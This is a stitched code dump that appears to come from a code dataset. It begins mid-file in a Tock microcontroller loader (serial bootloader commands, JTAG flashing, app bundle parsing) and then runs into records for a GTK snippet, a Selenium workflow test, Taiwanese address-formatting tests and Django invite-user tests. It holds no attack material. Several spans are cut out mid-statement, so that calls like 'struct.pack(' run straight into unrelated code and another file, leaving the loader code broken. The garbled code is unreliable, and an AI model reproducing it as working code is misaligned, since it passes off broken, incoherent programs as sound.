tab.is_compatible_with_board(self.channel.get_board_name()):\n\t\t\t\tapps.append(tab.extract_app(arch))\n\n\t\tif len(apps) == 0:\n\t\t\traise TockLoaderException('No valid apps for this board were provided. Use --force to override.')\n\n\t\treturn apps\n\n\t# Retrieve bytes from the board and interpret them as a string\n\tdef _get_app_name (self, address, length):\n\t\tif length == 0:\n\t\t\treturn ''\n\n\t\tname_memory = self.channel.read_range(address, length)\n\t\treturn name_memory.decode('utf-8')\n\n\t# Check if putting an app at this address will be OK with the MPU.\n\tdef _app_is_aligned_correctly (self, address, size):\n\t\t# The rule for the MPU is that the size of the protected region must be\n\t\t# a power of two, and that the region is aligned on a multiple of that\n\t\t# size.\n\n\t\t# Check if not power of two\n\t\tif (size & (size - 1)) != 0:\n\t\t\treturn False\n\n\t\t# Check that address is a multiple of size\n\t\tmultiple = address // size\n\t\tif multiple * size != address:\n\t\t\treturn False\n\n\t\treturn True\n\n\t############################################################################\n\t## Printing helper functions\n\t############################################################################\n\n\t# Print information about a list of apps\n\tdef _print_apps (self, apps, verbose, quiet):\n\t\tif not quiet:\n\t\t\t# Print info about each app\n\t\t\tfor i,app in enumerate(apps):\n\t\t\t\ttbfh = app['header']\n\t\t\t\tstart_address = app['address']\n\n\t\t\t\tprint('[App {}]'.format(i))\n\t\t\t\tprint(' Name: {}'.format(app['name']))\n\t\t\t\tprint(' Total Size in Flash: {} bytes'.format(tbfh['total_size']))\n\n\t\t\t\t# Check if this app is OK with the MPU region requirements.\n\t\t\t\tif not self._app_is_aligned_correctly(start_address, tbfh['total_size']):\n\t\t\t\t\tprint(' [WARNING] App is misaligned for the MPU')\n\n\t\t\t\tif verbose:\n\t\t\t\t\tprint(' Flash Start Address: {:#010x}'.format(start_address))\n\t\t\t\t\tprint(' Flash End Address: {:#010x}'.format(start_address+tbfh['total_size']-1))\n\t\t\t\t\tprint(' Entry Address: {:#010x}'.format(start_address+tbfh['entry_offset']))\n\t\t\t\t\tprint(' Relocate Data Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['rel_data_offset'], tbfh['rel_data_size']))\n\t\t\t\t\tprint(' Text Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['text_offset'], tbfh['text_size']))\n\t\t\t\t\tprint(' GOT Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['got_offset'], tbfh['got_size']))\n\t\t\t\t\tprint(' Data Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['data_offset'], tbfh['data_size']))\n\t\t\t\t\tprint(' Minimum Stack Size: {} bytes'.format(tbfh['min_stack_len']))\n\t\t\t\t\tprint(' Minimum Heap Size: {} bytes'.format(tbfh['min_app_heap_len']))\n\t\t\t\t\tprint(' Minimum Grant Size: {} bytes'.format(tbfh['min_kernel_heap_len']))\n\t\t\t\t\tprint(' Checksum: {:#010x}'.format(tbfh['checksum']))\n\t\t\t\tprint('')\n\n\t\t\tif len(apps) == 0:\n\t\t\t\tprint('No found apps.')\n\n\t\telse:\n\t\t\t# In quiet mode just show the names.\n\t\t\tapp_names = []\n\t\t\tfor app in apps:\n\t\t\t\tapp_names.append(app['name'])\n\t\t\tprint(' '.join(app_names))\n\n\tdef _print_attributes (self, attributes):\n\t\tfor index, attribute in enumerate(attributes):\n\t\t\tif attribute:\n\t\t\t\tprint('{:02d}: {:>8} = {}'.format(index, attribute['key'], attribute['value']))\n\t\t\telse:\n\t\t\t\tprint('{:02d}:'.format(index))\n\n\n################################################################################\n## Connection to the Board Classes\n################################################################################\n\n# Generic template class that allows actually talking to the board\nclass BoardInterface:\n\n\tdef __init__ (self, args):\n\t\tself.args = args\n\n\t\t# These settings need to come from somewhere. Once place is the\n\t\t# command line. Another is the attributes section on the board.\n\t\t# There could be more in the future.\n\t\t# Also, not all are required depending on the connection method used.\n\t\tself.board = getattr(self.args, 'board', None)\n\t\tself.arch = getattr(self.args, 'arch', None)\n\t\tself.jtag_device = getattr(self.args, 'jtag_device', None)\n\n\t# Open a connection to the board\n\tdef open_link_to_board (self):\n\t\treturn\n\n\t# Get access to the underlying serial port (if it exists).\n\t# This is used for running miniterm.\n\tdef get_serial_port (self):\n\t\treturn\n\n\t# Get to a mode where we can read & write flash\n\tdef enter_bootloader_mode (self):\n\t\treturn\n\n\t# Get out of bootloader mode and go back to running main code\n\tdef exit_bootloader_mode (self):\n\t\treturn\n\n\t# Write a binary to the address given\n\tdef flash_binary (self, address, binary):\n\t\treturn\n\n\t# Read a specific range of flash.\n\tdef read_range (self, address, length):\n\t\tif self.args.debug:\n\t\t\tprint('DEBUG => Read Range, address: {:#010x}, length: {}'.format(address, length))\n\n\t# Erase a specific page.\n\tdef erase_page (self, address):\n\t\treturn\n\n\t# Get a single attribute.\n\tdef get_attribute (self, index):\n\t\treturn\n\n\t# Get all atributes on a board.\n\tdef get_all_attributes (self):\n\t\treturn\n\n\t# Set a single attribute.\n\tdef set_attribute (self, index, raw):\n\t\treturn\n\n\tdef _decode_attribute (self, raw):\n\t\ttry:\n\t\t\tkey = raw[0:8].decode('utf-8').strip(bytes([0]).decode('utf-8'))\n\t\t\tvlen = raw[8]\n\t\t\tif vlen > 55 or vlen == 0:\n\t\t\t\treturn None\n\t\t\tvalue = raw[9:9+vlen].decode('utf-8')\n\t\t\treturn {\n\t\t\t\t'key': key,\n\t\t\t\t'value': value\n\t\t\t}\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\t# Default answer is to not answer.\n\tdef bootloader_is_present (self):\n\t\treturn None\n\n\t# Return the version string of the bootloader.\n\tdef get_bootloader_version (self):\n\t\treturn\n\n\t# Figure out which board we are connected to. Most likely done by\n\t# reading the attributes.\n\tdef determine_current_board (self):\n\t\treturn\n\n\t# Return the name of the board we are connected to.\n\tdef get_board_name (self):\n\t\treturn self.board\n\n\t# Return the architecture of the board we are connected to.\n\tdef get_board_arch (self):\n\t\treturn self.arch\n\n\n################################################################################\n## Bootloader Specific Functions\n################################################################################\n\nclass BootloaderSerial(BoardInterface):\n\n\t# \"This was chosen as it is infrequent in .bin files\" - immesys\n\tESCAPE_CHAR = 0xFC\n\n\t# Commands from this tool to the bootloader.\n\t# The \"X\" commands are for external flash.\n\tCOMMAND_PING = 0x01\n\tCOMMAND_INFO = 0x03\n\tCOMMAND_ID = 0x04\n\tCOMMAND_RESET = 0x05\n\tCOMMAND_ERASE_PAGE = 0x06\n\tCOMMAND_WRITE_PAGE = 0x07\n\tCOMMAND_XEBLOCK = 0x08\n\tCOMMAND_XWPAGE = 0x09\n\tCOMMAND_CRCRX = 0x10\n\tCOMMAND_READ_RANGE = 0x11\n\tCOMMAND_XRRANGE = 0x12\n\tCOMMAND_SET_ATTRIBUTE = 0x13\n\tCOMMAND_GET_ATTRIBUTE = 0x14\n\tCOMMAND_CRC_INTERNAL_FLASH = 0x15\n\tCOMMAND_CRCEF = 0x16\n\tCOMMAND_XEPAGE = 0x17\n\tCOMMAND_XFINIT = 0x18\n\tCOMMAND_CLKOUT = 0x19\n\tCOMMAND_WUSER = 0x20\n\tCOMMAND_CHANGE_BAUD_RATE = 0x21\n\n\t# Responses from the bootloader.\n\tRESPONSE_OVERFLOW = 0x10\n\tRESPONSE_PONG = 0x11\n\tRESPONSE_BADADDR = 0x12\n\tRESPONSE_INTERROR = 0x13\n\tRESPONSE_BADARGS = 0x14\n\tRESPONSE_OK = 0x15\n\tRESPONSE_UNKNOWN = 0x16\n\tRESPONSE_XFTIMEOUT = 0x17\n\tRESPONSE_XFEPE = 0x18\n\tRESPONSE_CRCRX = 0x19\n\tRESPONSE_READ_RANGE = 0x20\n\tRESPONSE_XRRANGE = 0x21\n\tRESPONSE_GET_ATTRIBUTE = 0x22\n\tRESPONSE_CRC_INTERNAL_FLASH = 0x23\n\tRESPONSE_CRCXF = 0x24\n\tRESPONSE_INFO = 0x25\n\tRESPONSE_CHANGE_BAUD_FAIL = 0x26\n\n\t# Tell the bootloader to reset its buffer to handle a new command.\n\tSYNC_MESSAGE = bytes([0x00, 0xFC, 0x05])\n\n\t# Open the serial port to the chip/bootloader\n\tdef open_link_to_board (self):\n\t\t# Check to see if the serial port was specified or we should find\n\t\t# one to use\n\t\tif self.args.port == None:\n\t\t\t# Nothing was specified, so we look for something marked as \"Tock\".\n\t\t\t# If we can't find something, it is OK.\n\t\t\tdevice_name = 'tock'\n\t\t\tmust_match = False\n\t\t\tprint('No device name specified. Using default \"{}\"'.format(device_name))\n\t\telse:\n\t\t\t# Since we specified, make sure we connect to that.\n\t\t\tdevice_name = self.args.port\n\t\t\tmust_match = True\n\n\t\t# Look for a matching port\n\t\tports = list(serial.tools.list_ports.grep(device_name))\n\t\tif len(ports) == 1:\n\t\t\t# Easy case, use the one that matches\n\t\t\tprint('Using \"{}\"'.format(ports[0]))\n\t\t\tindex = 0\n\t\telif len(ports) > 1:\n\t\t\tindex = menu(ports, return_type='index')\n\t\telse:\n\t\t\tif must_match:\n\t\t\t\t# We want to find a very specific board. If this does not\n\t\t\t\t# exist, we want to fail.\n\t\t\t\traise TockLoaderException('Could not find a board matching \"{}\"'.format(device_name))\n\n\t\t\t# Just find any port and use the first one\n\t\t\tports = list(serial.tools.list_ports.comports())\n\t\t\t# Mac's will report Bluetooth devices with serial, which is\n\t\t\t# almost certainly never what you want, so drop these\n\t\t\tports = [p for p in ports if 'Bluetooth-Incoming-Port' not in p[0]]\n\t\t\tif len(ports) == 0:\n\t\t\t\traise TockLoaderException('No serial ports found. Is the board connected?')\n\n\t\t\tprint('No serial port with device name \"{}\" found'.format(device_name))\n\t\t\tprint('Found {} serial port(s).'.format(len(ports)))\n\n\t\t\tif len(ports) == 1:\n\t\t\t\tprint('Using \"{}\"'.format(ports[0]))\n\t\t\t\tindex = 0\n\t\t\telse:\n\t\t\t\tindex = menu(ports, return_type='index')\n\t\tport = ports[index][0]\n\t\tset_terminal_title_from_port_info(ports[index])\n\n\t\t# Open the actual serial port\n\t\tself.sp = serial.Serial()\n\t\tself.sp.port = port\n\t\tself.sp.baudrate = 115200\n\t\tself.sp.parity=serial.PARITY_NONE\n\t\tself.sp.stopbits=1\n\t\tself.sp.xonxoff=0\n\t\tself.sp.rtscts=0\n\t\tself.sp.timeout=0.5\n\t\t# Try to set initial conditions, but not all platforms support them.\n\t\t# https://github.com/pyserial/pyserial/issues/124#issuecomment-227235402\n\t\tself.sp.dtr = 0\n\t\tself.sp.rts = 0\n\t\tself.sp.open()\n\n\tdef get_serial_port (self):\n\t\treturn self.sp\n\n\t# Reset the chip and assert the bootloader select pin to enter bootloader\n\t# mode.\n\tdef _toggle_bootloader_entry (self):\n\t\t# Reset the SAM4L\n\t\tself.sp.dtr = 1\n\t\t# Set RTS to make the SAM4L go into bootloader mode\n\t\tself.sp.rts = 1\n\t\t# Wait for the reset to take effect\n\t\ttime.sleep(0.1)\n\t\t# Let the SAM4L startup\n\t\tself.sp.dtr = 0\n\t\t# Wait for 500 ms to make sure the bootloader enters bootloader mode\n\t\ttime.sleep(0.5)\n\t\t# The select line can go back high\n\t\tself.sp.rts = 0\n\n\t# Reset the chip and assert the bootloader select pin to enter bootloader\n\t# mode.\n\tdef enter_bootloader_mode (self):\n\t\tself._toggle_bootloader_entry()\n\n\t\t# Make sure the bootloader is actually active and we can talk to it.\n\t\ttry:\n\t\t\tself._ping_bootloader_and_wait_for_response()\n\t\texcept:\n\t\t\ttry:\n\t\t\t\t# Give it another go\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself._toggle_bootloader_entry()\n\t\t\t\tself._ping_bootloader_and_wait_for_response()\n\t\t\texcept:\n\t\t\t\tprint('Error connecting to bootloader. No \"pong\" received.')\n\t\t\t\tprint('Things that could be wrong:')\n\t\t\t\tprint(' - The bootloader is not flashed on the chip')\n\t\t\t\tprint(' - The DTR/RTS lines are not working')\n\t\t\t\tprint(' - The serial port being used is incorrect')\n\t\t\t\tprint(' - The bootloader API has changed')\n\t\t\t\tprint(' - There is a bug in this script')\n\t\t\t\traise TockLoaderException('Could not attach to the bootloader')\n\n\t\t# Speculatively try to get a faster baud rate.\n\t\tself._change_baud_rate(self.args.baud_rate)\n\n\t# Reset the chip to exit bootloader mode\n\tdef exit_bootloader_mode (self):\n\t\tif self.args.jtag:\n\t\t\treturn\n\n\t\t# Reset the SAM4L\n\t\tself.sp.dtr = 1\n\t\t# Make sure this line is de-asserted (high)\n\t\tself.sp.rts = 0\n\t\t# Let the reset take effect\n\t\ttime.sleep(0.1)\n\t\t# Let the SAM4L startup\n\t\tself.sp.dtr = 0\n\n\t# Throws an exception if the device does not respond with a PONG\n\tdef _ping_bootloader_and_wait_for_response (self):\n\t\tfor i in range(30):\n\t\t\t# Try to ping the SAM4L to ensure it is in bootloader mode\n\t\t\tping_pkt = bytes([self.ESCAPE_CHAR, self.COMMAND_PING])\n\t\t\tself.sp.write(ping_pkt)\n\n\t\t\t# Read much more than we need in case something got in the\n\t\t\t# serial channel that we need to clear.\n\t\t\tret = self.sp.read(200)\n\n\t\t\tif len(ret) == 2 and ret[1] == self.RESPONSE_PONG:\n\t\t\t\treturn\n\t\traise TockLoaderException('No PONG received')\n\n\t# Setup a command to send to the bootloader and handle the response.\n\tdef _issue_command (self, command, message, sync, response_len, response_code, show_errors=True):\n\t\tif sync:\n\t\t\tself.sp.write(self.SYNC_MESSAGE)\n\t\t\ttime.sleep(0.0001)\n\n\t\t# Generate the message to send to the bootloader\n\t\tescaped_message = message.replace(bytes([self.ESCAPE_CHAR]), bytes([self.ESCAPE_CHAR, self.ESCAPE_CHAR]))\n\t\tpkt = escaped_message + bytes([self.ESCAPE_CHAR, command])\n\t\tself.sp.write(pkt)\n\n\t\t# Response has a two byte header, then response_len bytes\n\t\tret = self.sp.read(2 + response_len)\n\n\t\t# Response is escaped, so we need to handle that\n\t\twhile True:\n\t\t\tnum_escaped = ret.count(bytes([self.ESCAPE_CHAR, self.ESCAPE_CHAR]))\n\t\t\tif num_escaped > 0:\n\t\t\t\t# De-escape, and then read in the missing characters.\n\t\t\t\tret = ret.replace(bytes([self.ESCAPE_CHAR, self.ESCAPE_CHAR]), bytes([self.ESCAPE_CHAR]))\n\t\t\t\tret += self.sp.read(num_escaped)\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\tif len(ret) < 2:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: No response after issuing command')\n\t\t\treturn (False, bytes())\n\n\t\tif ret[0] != self.ESCAPE_CHAR:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: Invalid response from bootloader (no escape character)')\n\t\t\treturn (False, ret[0:2])\n\t\tif ret[1] != response_code:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: Expected return type {:x}, got return {:x}'.format(response_code, ret[1]))\n\t\t\treturn (False, ret[0:2])\n\t\tif len(ret) != 2 + response_len:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: Incorrect number of bytes received')\n\t\t\treturn (False, ret[0:2])\n\n\t\treturn (True, ret[2:])\n\n\t# If the bootloader on the board supports it and if it succeeds, try\n\t# to increase the baud rate to make everything faster.\n\tdef _change_baud_rate (self, baud_rate):\n\t\tpkt = struct.pack(' 0:\n\t\t\tif remaining > MAX_READ:\n\t\t\t\tthis_length = MAX_READ\n\t\t\t\tremaining -= MAX_READ\n\t\t\telse:\n\t\t\t\tthis_length = remaining\n\t\t\t\tremaining = 0\n\n\t\t\tmessage = struct.pack(' length:\n\t\t\tread = read[0:length]\n\n\t\treturn read\n\n\t# Read a specific range of flash.\n\tdef erase_page (self, address):\n\t\tbinary = bytes([0xFF]*512)\n\t\tcommands = [\n\t\t\t'r',\n\t\t\t'loadbin {{binary}}, {address:#x}'.format(address=address),\n\t\t\t'verifybin {{binary}}, {address:#x}'.format(address=address),\n\t\t\t'r\\ng\\nq'\n\t\t]\n\n\t\tself._run_jtag_commands(commands, binary)\n\n\t# Get a single attribute.\n\tdef get_attribute (self, index):\n\t\taddress = 0x600 + (64 * index)\n\t\tattribute_raw = self.read_range(address, 64)\n\t\treturn self._decode_attribute(attribute_raw)\n\n\tdef get_all_attributes (self):\n\t\t# Read the entire block of attributes using JTAG.\n\t\t# This is much faster.\n\t\tdef chunks(l, n):\n\t\t\tfor i in range(0, len(l), n):\n\t\t\t\tyield l[i:i + n]\n\t\traw = self.read_range(0x600, 64*16)\n\t\treturn [self._decode_attribute(r) for r in chunks(raw, 64)]\n\n\t# Set a single attribute.\n\tdef set_attribute (self, index, raw):\n\t\taddress = 0x600 + (64 * index)\n\t\tself.flash_binary(address, raw)\n\n\tdef get_bootloader_version (self):\n\t\taddress = 0x40E\n\t\tversion_raw = self.read_range(address, 8)\n\t\ttry:\n\t\t\treturn version_raw.decode('utf-8')\n\t\texcept:\n\t\t\treturn None\n\n\tdef get_serial_port (self):\n\t\traise TockLoaderException('No serial port for JLinkExe comm channel')\n\n\t# Figure out which board we are connected to. Most likely done by\n\t# reading the attributes.\n\tdef determine_current_board (self):\n\t\tif self.board and self.arch and self.jtag_device:\n\t\t\t# These are already set! Yay we are done.\n\t\t\treturn\n\n\t\t# The primary (only?) way to do this is to look at attributes\n\t\tattributes = self.get_all_attributes()\n\t\tfor attribute in attributes:\n\t\t\tif attribute and attribute['key'] == 'board' and self.board == None:\n\t\t\t\tself.board = attribute['value']\n\t\t\tif attribute and attribute['key'] == 'arch' and self.arch == None:\n\t\t\t\tself.arch = attribute['value']\n\t\t\tif attribute and attribute['key'] == 'jldevice':\n\t\t\t\tself.jtag_device = attribute['value']\n\n\t\t# Check that we learned what we needed to learn.\n\t\tif self.board == None or self.arch == None or self.jtag_device == 'cortex-m0':\n\t\t\traise TockLoaderException('Could not determine the current board or arch or jtag device name')\n\n\n################################################################################\n## Tock Application Bundle Object\n################################################################################\n\nclass TAB:\n\tdef __init__ (self, tab_name):\n\t\tself.tab = tarfile.open(tab_name)\n\n\tdef extract_app (self, arch):\n\t\tbinary_tarinfo = self.tab.getmember('{}.bin'.format(arch))\n\t\tbinary = self.tab.extractfile(binary_tarinfo).read()\n\n\t\t# First get the TBF header from the correct binary in the TAB\n\t\ttbfh = parse_tbf_header(binary)\n\n\t\tif tbfh['valid']:\n\t\t\tstart = tbfh['package_name_offset']\n\t\t\tend = start+tbfh['package_name_size']\n\t\t\tname = binary[start:end].decode('utf-8')\n\n\t\t\treturn {\n\t\t\t\t'address': None,\n\t\t\t\t'header': tbfh,\n\t\t\t\t'name': name,\n\t\t\t\t'binary': binary,\n\t\t\t}\n\t\telse:\n\t\t\traise TockLoaderException('Invalid TBF found in app in TAB')\n\n\tdef is_compatible_with_board (self, board):\n\t\tmetadata = self.parse_metadata()\n\t\tif metadata['tab-version'] == 1:\n\t\t\treturn 'only-for-boards' not in metadata or \\\n\t\t\t board in metadata['only-for-boards'] or \\\n\t\t\t metadata['only-for-boards'] == ''\n\t\telse:\n\t\t\traise TockLoaderException('Unable to understand version {} of metadata'.format(metadata['tab-version']))\n\n\tdef parse_metadata (self):\n\t\tmetadata_tarinfo = self.tab.getmember('metadata.toml')\n\t\tmetadata_str = self.tab.extractfile(metadata_tarinfo).read().decode('utf-8')\n\t\treturn pytoml.loads(metadata_str)\n\n\tdef get_supported_architectures (self):\n\t\tcontained_files = self.tab.getnames()\n\t\treturn [i[:-4] for i in contained_files if i[-4:] == '.bin']\n\n\tdef get_tbf_header (self):\n\t\t# Find a .bin file\n\t\tfor f in self.tab.getnames():\n\t\t\tif f[-4:] == '.bin':\n\t\t\t\tbinary_tarinfo = self.tab.getmember(f)\n\t\t\t\tbinary = self.tab.extractfile(binary_tarinfo).read()\n\n\t\t\t\t# Get the TBF header from a binary in the TAB\n\t\t\t\treturn parse_tbf_header(binary)\n\t\treturn {}\n\n\n################################################################################\n## General Purpose Helper Functions\n################################################################################\n\n# Parses a buffer into the Tock Binary Format header fields\ndef parse_tbf_header (buffer):\n\tout = {'valid': False}\n\n\t# Read first word to get the TBF version\n\tout['version'] = struct.unpack(' Variáveis globais\n\nui.connect_signals(Handler())\nwindow = ui.get_object(\"jn_a\")\nwindow.show_all()\n\nif __name__ == '__main__':\n Gtk.main()\n\n","sub_path":"util/codigo_base.py","file_name":"codigo_base.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"651324945","text":"import xlrd\nimport ddt\nimport unittest\nfrom time import sleep\nfrom loginPage import LoginPage\nfrom todoApplyPage import TodoApplyPage\nfrom selenium import webdriver\nimport os\nimport HTMLTestRunner\n\ndef get_test_data(path, sheetname):\n book = xlrd.open_workbook(path)\n sheet = book.sheet_by_name(sheetname)\n nrows = sheet.nrows\n data = []\n\n if nrows > 1:\n for r in range(1, nrows):\n user = {}\n user['name'] = []\n user['username'] = []\n for c in range (0, 13, 2):\n user['name'].append(sheet.cell_value(r, c))\n user['username'].append(sheet.cell_value(r, c+1))\n user['reason'] = sheet.cell_value(r, 14)\n user['start_time'] = sheet.cell_value(r, 15)\n user['end_time'] = sheet.cell_value(r, 16)\n user['place'] = sheet.cell_value(r, 17)\n data.append(user)\n return data\n else:\n return 0\n\npath = os.path.join(os.getcwd(),\"testData\\\\HRMS.xlsx\")\nsheetname = '出差'\n# sheetname = '出差' # 需要乘坐飞机\n\n@ddt.ddt\nclass TestBusiness(unittest.TestCase):\n\n def setUp(self):\n print(\"开始测试\")\n self.driver = webdriver.Chrome()\n self.driver.maximize_window()\n\n @ddt.data(*get_test_data(path, sheetname))\n def test_overtime(self, user):\n # 把已读取的数据信息赋值给变量\n name = user['name']\n username = user['username']\n reason = str(user['reason'])\n start_time = str(user['start_time'])\n end_time = str(user['end_time'])\n place = str(user['place'])\n\n # 初始化\n login_test = LoginPage(self.driver)\n apply_test = TodoApplyPage(self.driver)\n # 标志位,判断走申请流程还是审批流程\n flag = 0\n for n in range(0, 7):\n login_test.open()\n login_test.login(username[n])\n # 申请流程\n if not flag:\n print(\"申请人:\", username[n], name[n])\n apply_test.shadow_click()\n # 不要要乘坐飞机\n apply_test.apply_business(start_time, end_time, place, reason)\n # 需要乘坐飞机\n # apply_test.apply_business_need_plane(start_time, end_time, place, reason)\n apply_test.next_processer(name[n+1])\n apply_test.logout()\n flag += 1\n sleep(1)\n # 审批流程\n else:\n print(\"审批人\"+str(n)+\":\", username[n], name[n])\n apply_test.process()\n # 判断是否需要下一审批(是否有下一审批选择界面)\n result = apply_test.is_need_next_process(name[n+1])\n self.assertTrue(result != -1, \"测试不通过\")\n if result:\n return 0\n\n def tearDown(self):\n print(\"结束测试\\n\")\n sleep(2)\n self.driver.quit()\n\nif __name__ == '__main__':\n unittest.main()\n # unittest.TestLoader().loadTestsFromTestCase('TestLeave')\n # unittest.TextTestRunner.run()","sub_path":"old2/test_business_new2.py","file_name":"test_business_new2.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"345221060","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport twaddress\n\n\n@unittest.skip('Just skip...')\nclass CutTest(unittest.TestCase):\n def test_short_address(self):\n expect = ['高雄市', '三民區', '建工路', '415號']\n self.assertEqual(twaddress.cut('高雄市三民區建工路415號'), expect)\n\n def test_normal_address(self):\n expect = ['高雄市', '前鎮區', '成功二路', '25號', '5樓之1']\n self.assertEqual(twaddress.cut('高雄市前鎮區成功二路25號5樓之1'), expect)\n\n def test_hard_address(self):\n expect = []\n self.assertEqual(twaddress.cut('嘉義市溪興街153巷12弄25號5樓3室'), expect)\n\n def test_sections_numbers(self):\n expect = ('114', 'Neihu Dist., Taipei City', 'Sec. 1, Neihu Rd.', '', {'巷': '', '弄': '', '號': '306', '樓': '', '室': ''})\n cut_result = twaddress.cut('台北市內湖區內湖路1段306號')\n print(cut_result)\n self.assertEqual(cut_result, expect)\n\n\nclass GetTest(unittest.TestCase):\n def test_hard_address(self):\n expect = ('50F-60, No.30, Aly. 20, Ln. 10, Qixian 1st Rd., '\n 'Xinxing Dist., Kaohsiung City 800, Taiwan (R.O.C.)')\n self.assertEqual(twaddress.get('高雄市新興區七賢一路10巷20弄30號50樓之60'), expect)\n\n def test_sections_numbers(self):\n expect = \"No.306, Sec. 1, Neihu Rd., Neihu Dist., Taipei City 114, Taiwan (R.O.C.)\"\n get_result_1 = twaddress.get(\"台北市內湖區內湖路1段306號\")\n get_result_2 = twaddress.get(\"台北市內湖區內湖路一段306號\")\n self.assertEqual(get_result_1, expect)\n self.assertEqual(get_result_2, expect)\n\n def test_village_addresses(self):\n str_1 = \"桃園市桃園區建國里桃鶯路85號1樓\"\n str_2 = \"台南市鹽水區義稠里義稠65之1號1樓\"\n get_result_1 = twaddress.get(str_1)\n get_result_2 = twaddress.get(str_2)\n self.assertEqual(\n get_result_1,\n \"1F, No.85, Taoying Rd., Jianguo Vil., Taoyuan Dist., Taoyuan City 330, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\")\n self.assertEqual(\n get_result_2,\n \"65-1F, No.1, Yichou, Yichou Vil., Yanshui Dist., Tainan City 737, Taiwan (R.O.C.)\",\n msg=f\"Origianl string={str_2}\")\n\n def test_discard_neighborhood(self):\n str_1 = \"桃園市中壢區興南里一鄰中美路一段51號2樓\"\n get_result_1 = twaddress.get(str_1)\n self.assertEqual(\n get_result_1,\n \"2F, No.51, Sec. 1, Zhongmei Rd., Xingnan Vil., Zhongli Dist., Taoyuan City 320, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\")\n\n def test_parenthesis(self):\n str_1 = \"新北市板橋區成功路6巷7號2樓(現場僅供辦公室使用)\"\n get_result_1 = twaddress.get(str_1)\n self.assertEqual(\n get_result_1,\n \"2F, No.7, Ln. 6, Chenggong Rd., Banqiao Dist., New Taipei City 220, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\")\n\n def test_sub_numbers(self):\n str_1 = \"新北市板橋區中山路二段330之2號11樓\"\n get_results_1 = twaddress.get(str_1)\n self.assertEqual(\n get_results_1,\n \"11F, No.330-2, Sec. 2, Zhongshan Rd., Banqiao Dist., New Taipei City 220, Taiwan (R.O.C.)\",\n msg=f\"Original string={str_1}\"\n )","sub_path":"test/test_cut.py","file_name":"test_cut.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"562714440","text":"import json\nimport random\nimport uuid\n\nfrom faker import Factory\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom api_user.models import User, Profile\nfrom api_admin.utils.user_auth import authentication, UserFactory, ProfileFactory\n\nfaker = Factory.create()\n\n\nclass InviteListUserTesting(APITestCase):\n\n def setUp(self):\n self.uuid_cus = uuid.uuid1(random.randint(0, 2 ** 48 - 1))\n self.admin = UserFactory()\n self.profile = ProfileFactory(user=self.admin)\n self.client.credentials(HTTP_AUTHORIZATION=authentication(self.admin))\n self.url = '/api/v1/admin/invite_list_user/'\n\n def test_invite_list_user_with_all_email_valid(self):\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan@paradox.ai', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 2)\n self.assertEqual(len(response_data['invalid_user']), 0)\n self.assertEqual(User.objects.count(), 2)\n self.assertEqual(Profile.objects.count(), 2)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_invite_list_user_with_all_email_invalide(self):\n user = UserFactory(email='luan@paradox.ai', staff=False)\n profile = ProfileFactory(user=user)\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 0)\n self.assertEqual(len(response_data['invalid_user']), 2)\n self.assertEqual(User.objects.count(), 0)\n self.assertEqual(Profile.objects.count(), 0)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_with_one_email_valid_one_email_invalid(self):\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 1)\n self.assertEqual(response_data['valid_user'][0].get('email'), data[0].get('email'))\n self.assertEqual(len(response_data['invalid_user']), 1)\n self.assertEqual(response_data['invalid_user'][0].get('email'), data[1].get('email'))\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_with_email_duplicate(self):\n data = [{'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'luan@paradox.ai', 'name': 'Luan'},\n {'email': 'nqluan', 'name': 'Quang Luan'}]\n response = self.client.post(self.url, data)\n response_data = json.loads(response.content)\n self.assertEqual(len(response_data['valid_user']), 1)\n self.assertEqual(len(response_data['invalid_user']), 2)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n","sub_path":"src/api_admin/tests/invite_list_user.py","file_name":"invite_list_user.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
